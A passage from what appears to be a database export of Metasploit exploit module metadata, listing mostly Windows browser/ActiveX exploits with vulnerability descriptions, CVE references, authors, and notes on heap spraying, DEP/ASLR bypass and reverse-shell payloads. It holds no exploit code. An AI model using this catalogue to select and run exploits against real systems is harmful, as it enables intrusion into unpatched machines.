This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8 build 6.0.9.584.","Metasploit Framework License (BSD)","f","2005-03-01 00:00:00",0,,"passive","t","BID-12698, CVE-2005-0455, OSVDB-14305","MC " 520,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/roxio_cineplayer.rb","exploit","windows/browser/roxio_cineplayer","exploit/windows/browser/roxio_cineplayer","Roxio CinePlayer ActiveX Control Buffer Overflow",300,"This module exploits a stack-based buffer overflow in SonicPlayer ActiveX control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. By setting an overly long value to 'DiskType', an attacker can overrun a buffer and execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-04-11 00:00:00",0,,"passive","t","BID-23412, CVE-2007-1559, OSVDB-34779","Trancer " 521,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/safari_xslt_output.rb","exploit","windows/browser/safari_xslt_output","exploit/windows/browser/safari_xslt_output","Apple Safari Webkit libxslt Arbitrary File Creation",600,"This module exploits a file creation vulnerability in the Webkit rendering engine. It is possible to redirect the output of an XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module has been tested on Safari and Maxthon. 
Code execution can be achieved by first uploading the payload to the remote machine in VBS format, and then uploading a MOF file, which causes the Windows Management Instrumentation service to execute the VBS.","Metasploit Framework License (BSD)","f","2011-07-20 00:00:00",0,,"passive","t","CVE-2011-1774, OSVDB-74017, URL-http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html","Nicolas Gregoire" 522,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb","exploit","windows/browser/samsung_neti_wiewer_backuptoavi_bof","exploit/windows/browser/samsung_neti_wiewer_backuptoavi_bof","Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow",300,"This module exploits a vulnerability in the CNC_Ctrl.dll ActiveX control installed with the Samsung NET-i viewer 1.37. Specifically, when supplying a long string for the fname parameter to the BackupToAvi method, an integer overflow occurs, which leads to a subsequent buffer overflow due to the use of memcpy with an incorrect size, resulting in remote code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-04-21 00:00:00",0,,"passive","t","BID-53193, OSVDB-81453, URL-http://aluigi.altervista.org/adv/netiware_1-adv.txt","Luigi Auriemma, juan vazquez " 523,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb","exploit","windows/browser/sapgui_saveviewtosessionfile","exploit/windows/browser/sapgui_saveviewtosessionfile","SAP AG SAPgui EAI WebViewer3D Buffer Overflow",300,"This module exploits a stack buffer overflow in Siemens Unigraphics Solutions Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled with SAPgui. 
When passing an overly long string to the SaveViewToSessionFile() method, arbitrary code may be executed.","Metasploit Framework License (BSD)","f","2009-03-31 00:00:00",0,,"passive","t","CVE-2007-4475, OSVDB-53066, US-CERT-VU-985449","MC " 524,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/softartisans_getdrivename.rb","exploit","windows/browser/softartisans_getdrivename","exploit/windows/browser/softartisans_getdrivename","SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control (SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-08-25 00:00:00",0,,"passive","t","BID-30826, CVE-2007-1682, OSVDB-47794, US-CERT-VU-914785","MC " 525,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/sonicwall_addrouteentry.rb","exploit","windows/browser/sonicwall_addrouteentry","exploit/windows/browser/sonicwall_addrouteentry","SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender. 
By sending an overly long string to the ""AddRouteEntry()"" method located in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-11-01 00:00:00",0,,"passive","t","CVE-2007-5603, OSVDB-39069, URL-http://www.sec-consult.com/303.html","MC " 526,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb","exploit","windows/browser/symantec_altirisdeployment_downloadandinstall","exploit/windows/browser/symantec_altirisdeployment_downloadandinstall","Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute",600,"This module allows remote attackers to install and execute arbitrary files on a user's file system via AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.","Metasploit Framework License (BSD)","f","2009-09-09 00:00:00",0,,"passive","t","BID-36346, CVE-2009-3028, OSVDB-57893","MC " 527,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb","exploit","windows/browser/symantec_altirisdeployment_runcmd","exploit/windows/browser/symantec_altirisdeployment_runcmd","Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Symantec Altiris Deployment Solution. 
When sending an overly long string to the RunCmd() method of AeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-11-04 00:00:00",0,,"passive","t","BID-37092, CVE-2009-3033, OSVDB-60496","MC " 528,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/symantec_appstream_unsafe.rb","exploit","windows/browser/symantec_appstream_unsafe","exploit/windows/browser/symantec_appstream_unsafe","Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute",600,"This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the ""installAppMgr()"" method. The insecure method can be exploited to download and execute arbitrary files in the context of the currently logged-on user.","Metasploit Framework License (BSD)","f","2009-01-15 00:00:00",0,,"passive","t","CVE-2008-4388, OSVDB-51410","MC " 529,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb","exploit","windows/browser/symantec_backupexec_pvcalendar","exploit/windows/browser/symantec_backupexec_pvcalendar","Symantec BackupExec Calendar Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control. 
By sending an overly long string to the ""_DOWText0"" property located in the pvcalendar.ocx control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-02-28 00:00:00",0,,"passive","t","BID-26904, CVE-2007-6016, OSVDB-42358, URL-http://secunia.com/advisories/27885/","Elazar Broad " 530,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb","exploit","windows/browser/symantec_consoleutilities_browseandsavefile","exploit/windows/browser/symantec_consoleutilities_browseandsavefile","Symantec ConsoleUtilities ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Symantec's ConsoleUtilities. By sending an overly long string to the ""BrowseAndSaveFile()"" method located in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-11-02 00:00:00",0,,"passive","t","BID-36698, CVE-2009-3031, OSVDB-59597, URL-http://sotiriu.de/adv/NSOADV-2009-001.txt, URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00","Nikolas Sotiriu (lofi)" 531,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb","exploit","windows/browser/systemrequirementslab_unsafe","exploit/windows/browser/systemrequirementslab_unsafe","Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method",600,"This module allows attackers to execute code via an unsafe method in Husdawg, LLC. 
System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)","Metasploit Framework License (BSD)","f","2008-10-16 00:00:00",0,,"passive","t","CVE-2008-4385, OSVDB-50122, US-CERT-VU-166651","MC " 532,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/teechart_pro.rb","exploit","windows/browser/teechart_pro","exploit/windows/browser/teechart_pro","TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference",300,"This module exploits an integer overflow in TeeChart Pro ActiveX control. When sending an overly large/negative integer value to the AddSeries() property of TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the value and is later directly trusted and called upon. This module has been designed to bypass DEP only under IE8 with Java support. Multiple versions (including the latest version) are affected by this vulnerability that date back to as far as 2001. The following controls are vulnerable: TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4); TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD); TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E); TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196); TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258). 
The controls are deployed under several SCADA based systems including: Unitronics OPC server v1.3; BACnet Operator Workstation Version 1.0.76","Metasploit Framework License (BSD)","f","2011-08-11 00:00:00",0,,"passive","t","OSVDB-74446, URL-http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow","mr_me , sinn3r " 533,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb","exploit","windows/browser/tom_sawyer_tsgetx71ex552","exploit/windows/browser/tom_sawyer_tsgetx71ex552","Tom Sawyer Software GET Extension Factory Remote Code Execution",300,"This module exploits a remote code execution vulnerability in the tsgetx71ex553.dll ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect initialization under Internet Explorer. While the Tom Sawyer GET Extension Factory is installed with some versions of VMware Infrastructure Client, this module has been tested only with the versions installed with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX control tested is tsgetx71ex553.dll, version 5.5.3.238. This module achieves DEP and ASLR bypass using the well-known msvcr71.dll ROP chain. 
The dll is installed by default with the Embarcadero software, and loaded by the targeted ActiveX.","Metasploit Framework License (BSD)","f","2011-05-03 00:00:00",0,,"passive","t","BID-48099, CVE-2011-2217, OSVDB-73211, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=911","Elazar Broad, juan vazquez , rgod" 534,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/trendmicro_extsetowner.rb","exploit","windows/browser/trendmicro_extsetowner","exploit/windows/browser/trendmicro_extsetowner","Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution",300,"This module exploits a remote code execution vulnerability in Trend Micro Internet Security Pro 2010 ActiveX. When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-08-25 00:00:00",0,,"passive","t","CVE-2010-3189, EDB-14878, OSVDB-67561, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-165/","Trancer " 535,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/trendmicro_officescan.rb","exploit","windows/browser/trendmicro_officescan","exploit/windows/browser/trendmicro_officescan","Trend Micro OfficeScan Client ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. 
By sending an overly long string to the ""CgiOnUpdate()"" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-02-12 00:00:00",0,,"passive","t","BID-22585, CVE-2007-0325, OSVDB-33040","MC " 536,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/tumbleweed_filetransfer.rb","exploit","windows/browser/tumbleweed_filetransfer","exploit/windows/browser/tumbleweed_filetransfer","Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow",500,"This module exploits a stack buffer overflow in the vcst_eu.dll FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed SecureTransport suite. By sending an overly long string to the TransferFile() 'remotefile' function, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-04-07 00:00:00",0,,"passive","t","CVE-2008-1724, OSVDB-44252, URL-http://www.aushack.com/200708-tumbleweed.txt","patrick " 537,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb","exploit","windows/browser/ubisoft_uplay_cmd_exec","exploit/windows/browser/ubisoft_uplay_cmd_exec","Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",300,"The uplay ActiveX component allows an attacker to execute any command line action. User must sign in, unless auto-sign in is enabled and uplay must not already be running. Due to the way the malicious executable is served (WebDAV), the module must be run on port 80, so please make sure you have enough privilege to do that. 
Ubisoft released patch 2.04 as of Mon 20th July.","Metasploit Framework License (BSD)","f","2012-07-29 00:00:00",0,,"passive","t","CVE-2012-4177, OSVDB-84402, URL-http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fix, URL-http://seclists.org/fulldisclosure/2012/Jul/375","Ben Campbell , Richard Hicks , Tavis Ormandy , phillips321 " 538,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb","exploit","windows/browser/ultramjcam_openfiledig_bof","exploit/windows/browser/ultramjcam_openfiledig_bof","TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",300,"This module exploits a vulnerability found in TRENDnet SecurView Internet Camera's ActiveX control. By supplying a long string of data as the sFilter argument of the OpenFileDlg() function, it is possible to trigger a buffer overflow condition due to WideCharToMultiByte (which converts Unicode back to a multibyte string) overwriting the stack more than it should, which results in arbitrary code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-03-28 00:00:00",0,,"passive","t","CVE-2012-4876, EDB-18675, OSVDB-80661","rgod, sinn3r " 539,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ultraoffice_httpupload.rb","exploit","windows/browser/ultraoffice_httpupload","exploit/windows/browser/ultraoffice_httpupload","Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow",400,"This module exploits a stack-based buffer overflow in Ultra Shareware's Office Control. When processing the 'HttpUpload' method, the arguments are concatenated together to form a command line to run a bundled version of cURL. If the command fails to run, a stack-based buffer overflow occurs when building the error message. This is due to the use of sprintf() without proper bounds checking. 
NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.","Metasploit Framework License (BSD)","f","2008-08-27 00:00:00",0,,"passive","t","BID-30861, CVE-2008-3878, EDB-6318, OSVDB-47866","jduck , shinnai" 540,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/verypdf_pdfview.rb","exploit","windows/browser/verypdf_pdfview","exploit/windows/browser/verypdf_pdfview","VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow",300,"The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application.","Metasploit Framework License (BSD)","f","2008-06-16 00:00:00",0,,"passive","t","BID-32313, CVE-2008-5492, OSVDB-49871","MC , dean " 541,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb","exploit","windows/browser/viscom_movieplayer_drawtext","exploit/windows/browser/viscom_movieplayer_drawtext","Viscom Software Movie Player Pro SDK ActiveX 6.8",300,"Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows remote attackers to execute arbitrary code via a long strFontName parameter to the DrawText method. The victim will first be required to trust the publisher Viscom Software. 
This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.","Metasploit Framework License (BSD)","f","2010-01-12 00:00:00",0,,"passive","t","CVE-2010-0356, EDB-12320, OSVDB-61634","TecR0c , mr_me , shinnai" 542,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/vlc_amv.rb","exploit","windows/browser/vlc_amv","exploit/windows/browser/vlc_amv","VLC AMV Dangling Pointer Vulnerability",400,"This module exploits VLC media player when handling a .AMV file. By flipping the 0x41st byte in the file format (video width/height), VLC crashes due to an invalid pointer, which allows remote attackers to gain arbitrary code execution. The vulnerable packages include: VLC 1.1.4, VLC 1.1.5, VLC 1.1.6, VLC 1.1.7. Also, please note that IE 8 targets require Java support in order to run properly.","Metasploit Framework License (BSD)","f","2011-03-23 00:00:00",0,,"passive","t","CVE-2010-3275, OSVDB-71277, URL-http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11, URL-http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files","sinn3r " 543,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/vlc_mms_bof.rb","exploit","windows/browser/vlc_mms_bof","exploit/windows/browser/vlc_mms_bof","VLC MMS Stream Handling Buffer Overflow",300,"This module exploits a buffer overflow in VLC media player prior to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result in a stack buffer overflow when handling a malicious MMS URI. This module uses the browser as attack vector. A specially crafted MMS URI is used to trigger the overflow and get flow control through SEH overwrite. Control is transferred to code located in the heap through a standard heap spray. 
The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.","Metasploit Framework License (BSD)","f","2012-03-15 00:00:00",0,,"passive","t","CVE-2012-1775, OSVDB-80188, URL-http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c, URL-http://www.videolan.org/security/sa1201.html","Florent Hochwelker, juan vazquez , sinn3r " 544,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/webdav_dll_hijacker.rb","exploit","windows/browser/webdav_dll_hijacker","exploit/windows/browser/webdav_dll_hijacker","WebDAV Application DLL Hijacker",0,"This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type.","Metasploit Framework License (BSD)","f","2010-08-18 00:00:00",0,,"passive","t","URL-http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html, URL-http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt","hdm , jcran , jduck " 545,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/webex_ucf_newobject.rb","exploit","windows/browser/webex_ucf_newobject","exploit/windows/browser/webex_ucf_newobject","WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow",400,"This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-based buffer overflow will occur when copying attacker-supplied data using the sprintf function. It is noteworthy that this vulnerability was discovered and reported by multiple independent researchers. 
To quote iDefense's advisory, ""Before this issue was publicly reported, at least three independent security researchers had knowledge of this issue; thus, it is reasonable to believe that even more people were aware of this issue before disclosure."" NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.","Metasploit Framework License (BSD)","f","2008-08-06 00:00:00",0,,"passive","t","BID-30578, CVE-2008-3558, EDB-6220, OSVDB-47344, URL-http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849, URL-http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html, URL-http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml, URL-http://www.trapkit.de/advisories/TKADV2008-009.txt","Elazar Broad, Guido Landi, Tobias Klein, jduck " 546,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/winamp_playlist_unc.rb","exploit","windows/browser/winamp_playlist_unc","exploit/windows/browser/winamp_playlist_unc","Winamp Playlist UNC Path Computer Name Overflow",500,"This module exploits a vulnerability in the Winamp media player. This flaw is triggered when an audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12.","Metasploit Framework License (BSD)","f","2006-01-29 00:00:00",0,,"passive","t","BID-16410, CVE-2006-0476, OSVDB-22789","Faithless , hdm " 547,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/winamp_ultravox.rb","exploit","windows/browser/winamp_ultravox","exploit/windows/browser/winamp_ultravox","Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow",300,"This module exploits a stack buffer overflow in Winamp 5.24. 
By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be exploited from the browser or the winamp client itself.","Metasploit Framework License (BSD)","f","2008-01-18 00:00:00",0,,"passive","t","BID-27344, CVE-2008-0065, OSVDB-41707","MC " 548,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/windvd7_applicationtype.rb","exploit","windows/browser/windvd7_applicationtype","exploit/windows/browser/windvd7_applicationtype","WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX control in InterVideo WinDVD 7. By sending an overly long string to the ""ApplicationType()"" property, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-03-20 00:00:00",0,,"passive","t","BID-23071, CVE-2007-0348, OSVDB-34315","MC " 549,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/winzip_fileview.rb","exploit","windows/browser/winzip_fileview","exploit/windows/browser/winzip_fileview","WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow",300,"The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a remote attacker to execute arbitrary code on the system. The control contains several unsafe methods and is marked safe for scripting and safe for initialization. A remote attacker could exploit this vulnerability to execute arbitrary code on the victim system. 
WinZip 10.0 <= Build 6667 are vulnerable.","Metasploit Framework License (BSD)","f","2007-11-02 00:00:00",0,,"passive","t","BID-21060, CVE-2006-5198, OSVDB-30433","dean " 550,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/wmi_admintools.rb","exploit","windows/browser/wmi_admintools","exploit/windows/browser/wmi_admintools","Microsoft WMI Administration Tools ActiveX Buffer Overflow",500,"This module exploits a memory trust issue in the Microsoft WMI Administration tools ActiveX control. When processing a specially crafted HTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat the 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods as a trusted pointer. It makes an indirect call via this pointer which leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. Because mscorie.dll does not opt in to ASLR, this module should be reliable on all Windows versions. The WMI Administrative Tools are a standalone download & install (linked in the references).","Metasploit Framework License (BSD)","f","2010-12-21 00:00:00",0,,"passive","t","BID-45546, CVE-2010-3973, OSVDB-69942, URL-http://secunia.com/advisories/42693, URL-http://wooyun.org/bug.php?action=view&id=1006, URL-http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314, URL-http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf","MC , WooYun, jduck " 551,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/xmplay_asx.rb","exploit","windows/browser/xmplay_asx","exploit/windows/browser/xmplay_asx","XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow",400,"This module exploits a stack buffer overflow in XMPlay 3.3.0.4. The vulnerability is caused due to a boundary error within the parsing of playlists containing an overly long file name. 
This module uses the ASX file format.","Metasploit Framework License (BSD)","f","2006-11-21 00:00:00",0,,"passive","t","BID-21206, CVE-2006-6063, OSVDB-30537, URL-http://secunia.com/advisories/22999/","MC " 552,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/yahoomessenger_fvcom.rb","exploit","windows/browser/yahoomessenger_fvcom","exploit/windows/browser/yahoomessenger_fvcom","Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string to the ""fvCom()"" method from a yahoo.com domain, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-08-30 00:00:00",0,,"passive","t","BID-25494, CVE-2007-4515, OSVDB-37739, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591","MC " 553,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/yahoomessenger_server.rb","exploit","windows/browser/yahoomessenger_server","exploit/windows/browser/yahoomessenger_server","Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow",400,"This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. By sending an overly long string to the ""Server()"" method, and then calling the ""Send()"" method, an attacker may be able to execute arbitrary code. 
Using the payloads ""windows/shell_bind_tcp"" and ""windows/shell_reverse_tcp"" yields the best results.","Metasploit Framework License (BSD)","f","2007-06-05 00:00:00",0,,"passive","t","CVE-2007-3147, OSVDB-37082, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063817.html","MC " 554,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb","exploit","windows/browser/zenturiprogramchecker_unsafe","exploit/windows/browser/zenturiprogramchecker_unsafe","Zenturi ProgramChecker ActiveX Control Arbitrary File Download",600,"This module allows remote attackers to place arbitrary files on a user's file system via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.","Metasploit Framework License (BSD)","f","2007-05-29 00:00:00",0,,"passive","t","BID-24217, CVE-2007-2987, OSVDB-36715","MC " 555,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb","exploit","windows/browser/zenworks_helplauncher_exec","exploit/windows/browser/zenworks_helplauncher_exec","AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution",300,"This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run arbitrary commands on the victim machine. 
This module has been successfully tested with the ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.","Metasploit Framework License (BSD)","f","2011-10-19 00:00:00",0,,"passive","t","BID-50274, CVE-2011-2657, OSVDB-76700, URL-http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-318/","juan vazquez , rgod" 556,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/dcerpc/ms03_026_dcom.rb","exploit","windows/dcerpc/ms03_026_dcom","exploit/windows/dcerpc/ms03_026_dcom","Microsoft RPC DCOM Interface Overflow",500,"This module exploits a stack buffer overflow in the RPCSS service, this vulnerability was originally found by the Last Stage of Delirium research group and has been widely exploited ever since. This module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)","Metasploit Framework License (BSD)","t","2003-07-16 00:00:00",0,,"aggressive","t","BID-8205, CVE-2003-0352, MSB-MS03-026, OSVDB-2100","cazz , hdm , spoonm " 557,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/dcerpc/ms05_017_msmq.rb","exploit","windows/dcerpc/ms05_017_msmq","exploit/windows/dcerpc/ms05_017_msmq","Microsoft Message Queueing Service Path Overflow",400,"This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. The offset to the return address changes based on the length of the system hostname, so this must be provided via the 'HNAME' option. 
